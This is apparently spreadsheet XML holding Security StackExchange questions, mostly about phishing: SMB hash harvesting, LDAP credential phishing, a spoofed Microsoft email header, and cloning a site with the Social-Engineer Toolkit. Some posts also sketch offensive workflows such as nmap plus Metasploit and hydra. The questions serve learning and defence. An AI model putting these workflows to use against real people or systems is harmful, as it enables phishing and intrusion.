 &lt;p&gt;The server would then query the downloading computer for SMB credentials that many corporate networks use to restrict access to verified users.&lt;/p&gt;
 &lt;p&gt;In many cases, the downloading computers would respond and in the process provide the attackers with the user name and a cryptographic hash to the targeted network.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;But getting hashes is not the same as obtaining actual passwords.&lt;/p&gt;
 &lt;p&gt;So my question is: What harm is there in obtaining password hashes in a Windows environment?&lt;/p&gt;
 &lt;hr /&gt;
 &lt;p&gt;For reference about those emails: &lt;a href="https://github.com/ryhanson/phishery" rel="nofollow noreferrer"&gt;The Phishery Toolkit&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;hash&gt;&lt;windows&gt;&lt;smb&gt;</t>
  </si>
  <si>
    <t>What is next step after nmap + metasploit?</t>
  </si>
  <si>
    <t>&lt;p&gt;When I'm working on hack boxes, what I do (if not using Armitage) is:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;nmap the box to discover running services version&lt;/li&gt;
 &lt;li&gt;search metasploit to find a working exploit for that version&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;Now I'm stuck. What if the running service version is not vulnerable or the service version is said to have a vulnerability but not public exploit?&lt;/p&gt;
 &lt;p&gt;I was wondering what real hackers do beyond basic nmap + metasploit. When I don't have working exploits, I can't move forward. &lt;/p&gt;
 &lt;p&gt;I know you may say phishing or exploit writing. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;penetration-test&gt;&lt;vulnerability&gt;</t>
  </si>
  <si>
    <t>LDAP allows conveniently centralised authentication - but can this lead to complacent security practises?</t>
  </si>
  <si>
    <t>&lt;p&gt;Say you work for LargeCorp, you have a LDAP login to access your desktop, access various internal applications etc. &lt;/p&gt;
 &lt;p&gt;It's convienient because you don't have to independantly manage authentication for each application you use; this is convenient for both yourself - you don't need to remember ten different passwords, and for the developers, who don't need to implement their own authentication. &lt;/p&gt;
 &lt;p&gt;The problem is - say someone points me to an application which asks for my LDAP username and password - how can I be sure that this isn't a phishing attempt from someone within the organisation? This is a large corperation after all, I can't trust that developers are not incompetent/malicious. &lt;/p&gt;
 &lt;p&gt;The plausible example I can think of, is a disgruntled employee sends his manager a link to an internal application - 'Hey boss, check out this new tool we've made'. Boss logs in with his LDAP credentials and disgruntled employee now uses the boss's credentials to read his boss's emails. &lt;/p&gt;
 &lt;p&gt;Out in the wild - we'd suggest that you should use a different password for each website you use - so (assuming I have a perfectly random password) there would be no risk to my other logins by accessing this site. But with LDAP I have to use the same password. &lt;/p&gt;
 &lt;p&gt;What security principle is there that justifies LDAP centralisation? &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;ldap&gt;</t>
  </si>
  <si>
    <t>How did hackers compromise my EC2 instance?</t>
  </si>
  <si>
    <t>&lt;p&gt;My EC2 instance was hacked recently. It doesn't really matter as I'm just starting my website and there was no sensitive information on my server yet, but I do plan for there to be in the future. I am going to terminate the compromised server and set up another one in order to secure my website.&lt;/p&gt;
 &lt;p&gt;My issue is that I want to make sure this never happens again, and the only way I can convince myself that my new server is secure is by knowing how the first server was compromised and making sure that the new server cannot be compromised by the same method. However I am having trouble identifying/understanding how the first server was hacked.&lt;/p&gt;
 &lt;p&gt;The stack used is Rails 4.2.4 + Postgresql 9.3 + Puma + Nginx 1.4.6. The server I'm running is Ubuntu 14.04.2 LTS on an AWS EC2 t2.micro instance. My AWS access keys have not been published anywhere, and I am the only one who should have SSH access to my server.&lt;/p&gt;
 &lt;p&gt;Now I'm no hacker, or even a good sysadmin for that matter (though I'm learning) so I have to keep an open mind about how the server was infiltrated, but since the only way I access my server is by SSH, I'm assuming that is how hackers got in too. I had erroneously left an inbound security group rule for the SSH port 22 to have a source of 0.0.0.0/0, which also makes me think it is likely this is how hackers got in.&lt;/p&gt;
 &lt;p&gt;I access my server by ssh using a private key with command similar to&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;ssh -vi "/home/me/.ssh/my_private_key.pem" ubuntu@my_aws_instance.com
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I was notified of the compromise from an ec2-abuse@amazon.com email that my server had been making DDOS attacks. Although I couldn't verify this by looking around my logs, I did find some hidden php scripts in &lt;code&gt;/var/tmp&lt;/code&gt; which looked as if they were designed to send out phishing emails which convinced me that the server had indeed been hacked.&lt;/p&gt;
 &lt;p&gt;There is no password set up for ssh which was confirmed by &lt;code&gt;hydra&lt;/code&gt; when I tried to attack my own server. This implies to me that the attacker must have guessed my RSA private key... except I understand this is &lt;a href="https://security.stackexchange.com/questions/33238/brute-forcing-ssh-keys"&gt;not realistically possible&lt;/a&gt;.&lt;/p&gt;
 &lt;p&gt;I don't know of any other possible ways that the server could have been compromised. Does anyone have any ideas? Are any of my assumptions or steps wrong?&lt;/p&gt;
 &lt;p&gt;Inbound Security Group Rules (at the time of being hacked):&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;HTTP TCP 80 0.0.0.0/0
 PostgreSQL TCP 5432 0.0.0.0/0
 SSH TCP 22 0.0.0.0/0
 Custom TCP Rule TCP 9200 91.216.55.150/32
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Thanks in advance for your help. I'm sure that I have left out a lot of useful information so if there is anything more you'd like to know just ask.&lt;/p&gt;
 &lt;p&gt;EDIT:&lt;/p&gt;
 &lt;p&gt;The website does contain some fairly standard Rails data input functionality. Mainly through html forms and there I also allow for image upload using a gem called &lt;a href="https://github.com/carrierwaveuploader/carrierwave" rel="noreferrer"&gt;carrierwave&lt;/a&gt;.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;webserver&gt;&lt;ssh&gt;&lt;system-compromise&gt;</t>
  </si>
  <si>
    <t>user42178</t>
  </si>
  <si>
    <t>Does the secure attention key really increase security?</t>
  </si>
  <si>
    <t>&lt;p&gt;Are there any statistics on whether requiring the &lt;a href="https://security.stackexchange.com/questions/34972/whats-the-rationale-behind-ctrl-alt-del-for-login"&gt;secure attention key&lt;/a&gt; to be pressed on login actually increases security ?&lt;/p&gt;
 &lt;p&gt;I personally don't see the point of that :&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;if you're after credentials, you're better off phishing email or other app's credentials that allow access from the Internet. Phishing OS credentials won't do any good as you still need to be physically on the network to use them&lt;/li&gt;
 &lt;li&gt;if you're physically in the building and have access to the network you can do more damage, and the secure attention key won't do much either as you can completely replace the machine with your own one which doesn't care about the secure attention key (or rather does, but presents your &lt;em&gt;fake&lt;/em&gt; login screen when pressed)&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Also, there seems to be no SAK support in Mac and Linux support is weak (the code is in the kernel but no desktop manager appears to take advantage of it) and it seems no one is screaming about it, which makes me think it's more a security theatre popular in the Windows networks more than anything else.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;password-management&gt;</t>
  </si>
  <si>
    <t>Online traffic monitoring by ISP for safety purposes</t>
  </si>
  <si>
    <t>&lt;p&gt;I have a question regarding approach to online security and protection against viruses, malware and phishing by one of the biggest European ISP. Below you will find my understanding of the topic. &lt;strong&gt;Is ISP's approach safe? Would you use it? Do you know similar solutions/implementations? Is it worth to sacrifice privacy for this kind of safety?&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;The cyber shield logic:&lt;/strong&gt;&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Security team known as CERT in Orange ISP in &lt;a href="https://www.cert.orange.pl/cybertarcza" rel="nofollow noreferrer"&gt;Poland&lt;/a&gt; and &lt;a href="https://cert.orange.md/ro/cybershield" rel="nofollow noreferrer"&gt;Moldavia&lt;/a&gt; released service called "Cyber Shield".&lt;/li&gt;
 &lt;li&gt;Cyber Shield is a traffic monitoring middleware set between your router and the grid - ISP sees your requests and prevents you from visiting dangerous websites, but also can detect various trojans or ransomware going both directions (from and to your PC).&lt;/li&gt;
 &lt;li&gt;If you happen to click a phishing link, visit an infected website or distribute malware you will either be blocked by ISP's warning similar to the one generated by Chrome, when you visit "insecure content" or the internet access will be completely blocked.&lt;/li&gt;
 &lt;li&gt;ISP claims to be able to recognise susceptibility of devices present in your local network to external threats and can block the connection if safety requirements are not met.&lt;/li&gt;
 &lt;li&gt;If danger is identified, ISP provides customer with detailed instruction regarding problem solving, e.g. scanning for viruses, setting up wi-fi password, disabling remote access to your router's configuration panel.&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;antivirus&gt;&lt;antimalware&gt;&lt;ransomware&gt;&lt;isp&gt;</t>
  </si>
  <si>
    <t>How can I safely view the code of a VBA macro?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have received a phishing email with the usual bogus bill in the form of a Word document. I am curious about what the probable virus wants to do so I would like to inspect the code. &lt;/p&gt;
 &lt;p&gt;At the moment Word opens the docx in protected mode, and I am not going to disable that as I assume that the VBA macro would execute immediately. &lt;/p&gt;
 &lt;p&gt;I know that a VM might be a solution, but excluding that (I don't have one to hand), is there a simple way to see the macro code without executing it? I'm thinking something like open it in Notepad or similar. I know Notepad doesn't read .docx but along those lines. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;virus&gt;&lt;phishing&gt;&lt;office&gt;</t>
  </si>
  <si>
    <t>How to hunt for phishing websites?</t>
  </si>
  <si>
    <t>&lt;p&gt;I am a researcher and want to test our phishing website identification tools, but we don't want to rely on any already-identified phishing sites. Instead, we want to find fresh potential phishing sites in real-time. My intention is similar to &lt;a href="https://security.stackexchange.com/questions/61200/crawling-for-phishing-websites"&gt;Crawling for Phishing Websites&lt;/a&gt;, but we do not work for any particular brand and don't have access to any webpage.&lt;/p&gt;
 &lt;p&gt;My question is what URLs/what type of URLs should we scan for? I don't think scanning against any list, such as Alexa top million, will give us any good result. Any guidance is appreciated!&lt;/p&gt;</t>
  </si>
  <si>
    <t>How do I know that mobile apps aren't stealing my login info?</t>
  </si>
  <si>
    <t>&lt;p&gt;This thought just occurred to me. If you're using an unofficial client to access a service (ex. BaconReader for reddit), how can you be certain that your login information isn't being stolen? &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;mobile&gt;&lt;audit&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>What are the risks associate with accessing Same web application with two different URLs?</t>
  </si>
  <si>
    <t>&lt;p&gt;We have done vulnerability analysis with third party security team. They have mentioned one point as critical findings but i don't understand risk associated with it and suggested remedial action also bit confusing.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Finding&lt;/strong&gt; : &lt;em&gt;Same web application can be access by two different URLS&lt;/em&gt;.
 Ex: &lt;a href="http://1.1.1.1/abc" rel="nofollow noreferrer"&gt;http://1.1.1.1/abc&lt;/a&gt;, &lt;a href="http://example.com/abc" rel="nofollow noreferrer"&gt;http://example.com/abc&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Remedial Action&lt;/strong&gt; : &lt;em&gt;Upgrade PHP Version&lt;/em&gt; and
 &lt;em&gt;Modify the HTTP ETag header of the web server to not include file inodes in the
 ETag header calculation.&lt;/em&gt;&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Third Party Security Team Explanation&lt;/strong&gt; : &lt;em&gt;Users may confuse and they may victim of phishing attack&lt;/em&gt;&lt;/p&gt;
 &lt;p&gt;Could you please tell me someone what are the risks associated with accessing same application with It IP address and Domain name?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;url-redirection&gt;&lt;url&gt;&lt;vulnerability-assessment&gt;</t>
  </si>
  <si>
    <t>Why is a fully-patched OS less important than AV?</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;a href="https://security.stackexchange.com/questions/221348/how-to-explain-to-traditional-people-why-they-should-upgrade-their-old-windows-x"&gt;How to explain to traditional people why they should upgrade their old Windows XP device?&lt;/a&gt; &amp;lt;- The interesting point made in the highest upvoted answer to this Q is that a fully patched OS is largely insignificant for the security of an 'average home elder'. On the other hand, regular backups and AV software are essential.&lt;/p&gt;
 &lt;p&gt;While I do understand the point about backups, the point about patches vs AV is surprising for me &lt;em&gt;precisely because I was usually being told something opposite&lt;/em&gt;.&lt;/p&gt;
 &lt;p&gt;Usually, I was being told that for the security of a home user, the first points to consider are: Full disk encryption (defense against device theft), password managers that allow one to abandon reusing passwords (defense against hacked websites), &lt;strong&gt;fully patched software&lt;/strong&gt; and enabled firewall (defense against malware, especially the kinds that infect the computer without a person's knowledge and consent), backups (defense against hardware failure and attacks that somehow slip through the other lines of defense).&lt;/p&gt;
 &lt;p&gt;Antivirus software, while still important, nonetheless is dead last on the above list because:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;The main purpose of AV is to defend against well-known, indiscriminate threats. This, as I understand, often means threats that would be stopped either by fully patched software or user's diligence &lt;sub&gt;(do not run unknown executables, do not click on links in phishing e-mail, ...)&lt;/sub&gt; in the first place. Even worse, fully patched software paired with user's diligence will be able to stop far more threats than AV.&lt;/li&gt;
 &lt;li&gt;AVs slow the computer down and open up their own attack vector.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Sources (examples): &lt;a href="https://security.stackexchange.com/questions/182284/alternatives-to-anti-virus-for-keeping-oneself-safe/182288#182288"&gt;1&lt;/a&gt;, &lt;a href="http://nbzp.cz/10-porad-bezpieczenstwa" rel="nofollow noreferrer"&gt;2&lt;/a&gt;, [3](&lt;/p&gt;
 &lt;p&gt;Of course user's diligence cannot be relied upon (many claim the human is the weakest link in any security system), &lt;em&gt;especially&lt;/em&gt; in the case of home elders, so I'm not going to argue AV software is not important. It's just that I cannot see how can fully patched OS be less important here?&lt;/p&gt;
 &lt;p&gt;Note that since we're talking about the 'average home elder' I do not consider it a realistic scenario that they are personally targeted. However, I should note that I've been told about such a case that a hacked website of a &lt;em&gt;parish&lt;/em&gt; was installing malware on its visitors' computer. For this reason I'm not sure if it is possible to rule out drive by download.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;antivirus&gt;&lt;defense&gt;&lt;updates&gt;</t>
  </si>
  <si>
    <t>Microsoft account security alert - Is this legit?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've just received two emails in a row stating that "We detected something unusual about a recent sign-in for the Microsoft account" and "someone else might have accessed the Microsoft account..." (see image attached). Seems a little "phishy" to me considering it's a &lt;em&gt;gmail&lt;/em&gt; account. Last time I checked gmail was owned by Google not Microsoft. But what's weird is when clicking on the recover account button it appears to lead to the real Microsoft website. Can someone please confirm if this is a scam? &lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/0bAmH.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/0bAmH.png" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/PP3H6.jpg" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/PP3H6.jpg" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email-spoofing&gt;&lt;microsoft&gt;</t>
  </si>
  <si>
    <t>Why are @microsoft.com e-mail address not protected against spoofing</t>
  </si>
  <si>
    <t>&lt;p&gt;I got a lot of phishing attempts that appear to come from an actual microsoft.com e-mail address (see &lt;a href="https://answers.microsoft.com/en-us/xbox/forum/all/i-need-some-verification-about-unusual-login/16a81457-40c3-4c76-b864-3a7a9e5bfa58" rel="nofollow noreferrer"&gt;I need some verification about unusual login emails&lt;/a&gt;)&lt;/p&gt;
 &lt;p&gt;I though this was odd, since I had hoped that &amp;quot;popular&amp;quot; e-mail domains like this would be protected against this sort of thing.&lt;/p&gt;
 &lt;p&gt;A similar question was asked before &lt;a href="https://security.stackexchange.com/questions/264450/how-could-i-get-a-spam-phishing-email-from-microsoft-com"&gt;How could I get a spam/phishing email from microsoft.com&lt;/a&gt; but closed as a duplicate to &lt;a href="https://security.stackexchange.com/questions/204770/why-do-phishing-e-mails-use-faked-e-mail-addresses-instead-of-the-real-one"&gt;Why do phishing e-mails use faked e-mail addresses instead of the real one?&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;The accepted answer states:&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;, the mail would likely be blocked since this domain is protected with Sender Policy Framework (SPF), DomainKeys Identified Mail (DKIM), and Domain-based Message Authentication, Reporting and Conformance (DMARC).&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;But apparently that's not working. To make it worse: not only do I get the messages, I get them from a Microsoft e-mail server (Hotmail/outlook).&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Why can't Microsoft block phishing from spoofed e-mail addresses that use their very own domain name? Can they not verify whether an e-mail is actually coming from microsoft.com ?&lt;/li&gt;
 &lt;li&gt;Is there anything a user can do to detect e-mail address spoofing?&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;UPDATE: message header added&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Received: from AM9PR08MB6129.eurprd08.prod.outlook.com (2603:10a6:20b:284::8)
  by AM0PR08MB4529.eurprd08.prod.outlook.com with HTTPS; Sun, 30 Oct 2022
  02:48:48 +0000
 Received: from AS9PR06CA0249.eurprd06.prod.outlook.com (2603:10a6:20b:45f::22)
  by AM9PR08MB6129.eurprd08.prod.outlook.com (2603:10a6:20b:284::8) with
  Microsoft SMTP Server (version=TLS1_2,
  cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id 15.20.5769.18; Sun, 30 Oct
  2022 02:48:47 +0000
 Received: from AM7EUR06FT067.eop-eur06.prod.protection.outlook.com
  (2603:10a6:20b:45f:cafe::db) by AS9PR06CA0249.outlook.office365.com
  (2603:10a6:20b:45f::22) with Microsoft SMTP Server (version=TLS1_2,
  cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id 15.20.5769.16 via Frontend
  Transport; Sun, 30 Oct 2022 02:48:47 +0000
 Authentication-Results: spf=none (sender IP is 89.144.43.86)
  smtp.mailfrom=quihzero.co.uk; dkim=none (message not signed)
  header.d=none;dmarc=fail action=oreject
  header.from=microsoft.com;compauth=fail reason=000
 Received-SPF: None (protection.outlook.com: quihzero.co.uk does not designate
  permitted sender hosts)
 Received: from quihzero.co.uk (89.144.43.86) by
  AM7EUR06FT067.mail.protection.outlook.com (10.233.254.166) with Microsoft
  SMTP Server id 15.20.5769.14 via Frontend Transport; Sun, 30 Oct 2022
  02:48:47 +0000
 X-IncomingTopHeaderMarker:
  OriginalChecksum:1393D9D28C27CFD772090722ACDC70192B7D53D58DBECEC0ABA09BE195031F4F;UpperCasedChecksum:1C9A33C9E651F3E56C924390CF2CF7AE1A4C0C7C3AC33D388CFD085852D5347B;SizeAsReceived:327;Count:10
 From: Microsoft account team &amp;lt;no-reply@microsoft.com&amp;gt;
 Subject: Microsoft account unusual sign-in activity
 To: xxxx
 X-Message-Flag: Flag
 Importance: high
 Date: Sun, 30 Oct 2022 02:48:47 +0000
 Reply-To: newsletter@figoshine.com
 Content-Type: text/html; charset=&amp;quot;UTF-8&amp;quot;
 Content-Transfer-Encoding: 8bit
 Mime-Version: 1.0
 X-IncomingHeaderCount: 10
 Message-ID:
  &amp;lt;319bf62a-9178-408a-bcdf-492af20e9a26@AM7EUR06FT067.eop-eur06.prod.protection.outlook.com&amp;gt;
 Return-Path: bounce@quihzero.co.uk
 X-MS-Exchange-Organization-ExpirationStartTime: 30 Oct 2022 02:48:47.4195
  (UTC)
 X-MS-Exchange-Organization-ExpirationStartTimeReason: OriginalSubmit
 X-MS-Exchange-Organization-ExpirationInterval: 1:00:00:00.0000000
 X-MS-Exchange-Organization-ExpirationIntervalReason: OriginalSubmit
 X-MS-Exchange-Organization-Network-Message-Id:
  ad32cc46-e363-40c8-5762-08daba21449d
 X-EOPAttributedMessage: 0
 X-EOPTenantAttributedMessage: 84df9e7f-e9f6-40af-b435-aaaaaaaaaaaa:0
 X-MS-Exchange-Organization-MessageDirectionality: Incoming
 X-MS-PublicTrafficType: Email
 X-MS-TrafficTypeDiagnostic: AM7EUR06FT067:EE_|AM9PR08MB6129:EE_
 X-MS-Exchange-Organization-AuthSource:
  AM7EUR06FT067.eop-eur06.prod.protection.outlook.com
 X-MS-Exchange-Organization-AuthAs: Anonymous
 X-MS-UserLastLogonTime: 10/30/2022 1:44:43 AM
 X-MS-Office365-Filtering-Correlation-Id: ad32cc46-e363-40c8-5762-08daba21449d
 X-MS-Exchange-EOPDirect: true
 X-Sender-IP: 89.144.43.86
 X-SID-PRA: NO-REPLY@MICROSOFT.COM
 X-SID-Result: NONE
 X-MS-Exchange-Organization-PCL: 2
 X-MS-Exchange-AtpMessageProperties: SA|SL
 X-Microsoft-Antispam: BCL:5;
 X-MS-Exchange-CrossTenant-OriginalArrivalTime: 30 Oct 2022 02:48:47.3883
  (UTC)
 X-MS-Exchange-CrossTenant-Network-Message-Id: ad32cc46-e363-40c8-5762-08daba21449d
 X-MS-Exchange-CrossTenant-Id: 84df9e7f-e9f6-40af-b435-aaaaaaaaaaaa
 X-MS-Exchange-CrossTenant-AuthSource:
  AM7EUR06FT067.eop-eur06.prod.protection.outlook.com
 X-MS-Exchange-CrossTenant-AuthAs: Anonymous
 X-MS-Exchange-CrossTenant-FromEntityHeader: Internet
 X-MS-Exchange-CrossTenant-RMS-PersistedConsumerOrg:
  00000000-0000-0000-0000-000000000000
 X-MS-Exchange-Transport-CrossTenantHeadersStamped: AM9PR08MB6129
 X-MS-Exchange-Transport-EndToEndLatency: 00:00:00.6947243
 X-MS-Exchange-Processed-By-BccFoldering: 15.20.5769.016
 X-MS-Exchange-Organization-SCL: 6
 X-Message-Info:
  6hMotsjLow8ibk1nPury0UhKZyI0kDcBH3HX+gj5xkU0oEZLZj27dS8EuEDGWvYY4wRnFrgjoiQXuXtpCFY4AtIav9urZ9o/xPpo+Zpn8Ehh21LOscMdVc+ixqln+MqPxOY0U8MLMianUJxC7jHkJnCbQdDPYYWl9RQMPskLvS6wq698TkT/9W97EsTAPl8UNW2JF9Wwoasq0U9i/q5zvA==
 X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MjtHRD0zO1NDTD02
 X-Microsoft-Antispam-Mailbox-Delivery:
  rwl:0;ucf:0;jmr:0;ex:0;psp:0;auth:0;dest:J;OFR:SpamFilterAuthJ;ENG:(5062000305)(90000117)(90005022)(91005020)(91035115)(5061607266)(5061608174)(9050020)(9100338)(2008001134)(2008121020)(4810004)(4910033)(9610025)(9525003)(10140023)(9320005)(9245025);RF:JunkEmail;
 X-Microsoft-Antispam-Message-Info:
  =?us-ascii?Q?BSMr/fdT7aQylDzqKGtPSwe+skSGB6mtyx9dEriKY357rtTmgqrAHTUQrU1N?=
  =?us-ascii?Q?hiTCyq7olzTA+Gczf8+ZyxUqd2H2V9LXAKjXcw1nRxNULqGhPGN8Ge+91k7s?=
  =?us-ascii?Q?ViDV8JS1FiihusL+PYD+504joxNeKeRpT2TKvDPbz02WYxlCWPr8QL9H3Gqo?=
  =?us-ascii?Q?+OH4iDzt4gdsfSMOpYzBUuTfYEvietq/rbocc+0BzukeY2EHRK/L7OCCvJq+?=
  =?us-ascii?Q?r/79v3UKAOw1sttn9sttvVx5OQ85HE6mymRHiTj6sWllt16NDa4KphmxB+FC?=
  =?us-ascii?Q?ncvGam8POFv4waoSc01ehc51ck1VJ9qE3MMCR/lW2WWL05FTICjhbn8rDBeE?=
  =?us-ascii?Q?zFO86coX4mIAQ+bdDAP3d7l2RXKP8ZrrhoCRMZyojSZ05oN/K+ExEiHBk1ri?=
  =?us-ascii?Q?Nr48flr4RU6Dp+0MkvBVP/leufkFXAoVChTblS3Sbr03vs05+XxgqJ4AaMw5?=
  =?us-ascii?Q?HnSkbDQUXL0RreiWxmfbNrgjepxMIwMxpaLFxUUzaU6ELNHY2qJjn71Amx90?=
  =?us-ascii?Q?QmxCRUThaI3fLtRLT1FVIsK+qzBStFGNrfy8unyvRqSBuqk4oVWZ1mCu61yP?=
  =?us-ascii?Q?1M7hawlhQl5vx7D+ufPEro4HWiFWuL79V1Q91SxwCPAcCnV8U19VAZqVub2f?=
  =?us-ascii?Q?LoQMGbI65sHpiHfaPQ8XB0C/UPXnXCPnuOleXpd58+ICJXbpgRVzD/ra2Ve3?=
  =?us-ascii?Q?IkUC+I/ZyHQvKl5xtoGbmgabv62MyuVJKrEqw8fpzsK4YT1iQmz5mZeHZ5JJ?=
  =?us-ascii?Q?PM33vM3RI8lOCdnpkfEFWPYl0Z9La7dJrvOq3xGhmPns4Z2U69FlkaAJzM20?=
  =?us-ascii?Q?hR0swqzGjtomABNT5zNM8lFVCm6i+GErTL8wZ3mHlnU2MwBF4G/aAa1e2hhb?=
  =?us-ascii?Q?TMnsovdC483irFqMDzURbX1/qHBtWDOrcCsj9ZMbTQFi9gOZaYhkGJQYNUi8?=
  =?us-ascii?Q?0NvjLa/Ggjhr6wJ8Ub+E7Z06LN2DkNMiZZDuxGBhExU8g6VdmNlkW/t5qjqi?=
  =?us-ascii?Q?LHLliWE7wFJ6nCMh7WNiwrJQzTJYf4jhCvW7Wf2xLiFCwl/HWgi/9VhrIBtX?=
  =?us-ascii?Q?91ZJhs+w1dA0f6vBqekogzLn6ij33av70amtx0M96SaeuJKyzWG3JuRkiQ7q?=
  =?us-ascii?Q?fqWaWhlacul1YeYekBqEVtAkHGHpvs707KcWQwSQ4LcCaPDkfFXkDQq0p+cq?=
  =?us-ascii?Q?3Ov7kb4FTARGBm4OblCCxoDruhODoCASHGgeD5Aaqgn+KkbEfsqITzuWkSEB?=
  =?us-ascii?Q?mTt5e82fD1L/kPAmvLG6HeRPubPsXD36BB6Hbdm83HRExdB6k9hTQHhR4n+5?=
  =?us-ascii?Q?s4/jPcRPWdOPxv9JK6hymS66hn/nRb+6Ln/Eysi8AjHLfJz/ZeoUnh3inDI2?=
  =?us-ascii?Q?55R1MSu9Y73FLqSoVNL26qHytLQnIKq//N45B6ge0eR1ZxhUHQFfIQZcTKJy?=
  =?us-ascii?Q?73nqLLXA8K4kogrRJKlGy4d13r9KlkczDGkaDnP6icKcxqC+STVPUN/Pp6jd?=
  =?us-ascii?Q?2U9+MC0FJEObg/5ZRZ/59wmbRIW/uITWS8103yLrnKN8hOfiDJrCSz3mDwis?=
  =?us-ascii?Q?/Qiztrpcg70ZR6fIflAFRZoa4ZEQCM8PSW17sCt8MsJdc5w2ZodnOw7WN3h4?=
  =?us-ascii?Q?MrgtkSwCVc+1MzAcRNX3nYKUEhcLpeo6dlq4U2GymaL/eU9rDWWg1aNNdPUM?=
  =?us-ascii?Q?PTqyF5odF+yIknT3KcN8tl3U6ATc9zlPoHBliXvVaykH+F8DKWaIPs/5099Z?=
  =?us-ascii?Q?wxHj2mn8d4dlRix8oeFnr57LPkWopecg73Pazh6QF0CSx2yma8YAerO2muw4?=
  =?us-ascii?Q?Xl81AIS7FEl5nOae0w2wJi3ItNyzjnmx1oTyk7Ue5eDX3TH+pqQ/EOSa4OBk?=
  =?us-ascii?Q?owRcNMk3pIxuh0VtFm9/adeQA3dFKkliR4XsefAUHNnmE1MpsPkqmdwz1KHx?=
  =?us-ascii?Q?clMqzpP3fRESUW/JLRsdpwqA0+V7fbyN0Ada6ekxucB3+B/i2z6fBFIfRPWm?=
  =?us-ascii?Q?DpHACUyWGfixY6sRYjUz981gSfYLEZrCovDnmteWVFX9634KwNJc1wlf2Gvr?=
  =?us-ascii?Q?8Kenmq02yngxI7BUuHS3Pf3mZ3oIQd5CQXu45cS3U67/WkUXJ/8fceVXJ83b?=
  =?us-ascii?Q?XW3XFRHsH46dIjWVnDyVYyQwI+8f/YRR8t/KQ/D3fCXejTSIcjR+jwoFsErO?=
  =?us-ascii?Q?/zNCJse50N5kXvenyStcD0FsBDS6Jeue+5J2v8GiRBeablnGXXvT1rRLSTAH?=
  =?us-ascii?Q?tMvekEcG5XYRLXOMz6bWLHK9y3YfNc5whP0VlDlGPjtu5J8pwCNg4t+hndnp?=
  =?us-ascii?Q?Ua2sgl8Q4HQKiqXC1bLC/LSnCnTfxAAdf6nx48GFNae3mUPcw27YJiOYhA/n?=
  =?us-ascii?Q?S57gbD+qgcY7m1oEG0dm3y4yQHrhk8wY0vLBzkB8P8VQxHqXnBQF7kO4Pox/?=
  =?us-ascii?Q?ostdwdkURfcVvkSp321RvVoCQ0iR7/1iCrBlSCILzbvmWrpgUjfhf1srWZq+?=
  =?us-ascii?Q?GpRO+u8HwNBxeV0x9uSj7lMWKrzBRi421G/gldNjfDHJIVP4SqvfDa9naWVP?=
  =?us-ascii?Q?CDKyjxayYKaTbtnhaSFIbhBJ2+evzWQ+p6jnFELOe084hf2bTAOFt7pOqvD2?=
  =?us-ascii?Q?oGu6jxWLX31Tk65QzjCtzElVT61VxJ//zyCZWWM5IJluzCSnkR32z/z/bryV?=
  =?us-ascii?Q?KjT9bvSZI7CQHRP+hD2rgyeTneeqqQdKvtO4UizAjJnWTZMqKMKHn3l5mDjX?=
  =?us-ascii?Q?X8Qkl0C47bBcLHp7hqCHOJh27Ue9ebk=3D?=
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;email-spoofing&gt;&lt;protection&gt;</t>
  </si>
  <si>
    <t>SETOOL Kit:Error: "Unable to Clone the site. Check your network connection"</t>
  </si>
  <si>
    <t>&lt;p&gt;I have to tried to check whether a site is vulnerable to Phishing attack or not using "Setool kit" in Kali Linux. But when I tried to clone a site using this Setool Kit in Kali Linux, I got an error like:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;"Unable to clone the specific site. Check for network connection"&lt;/p&gt;
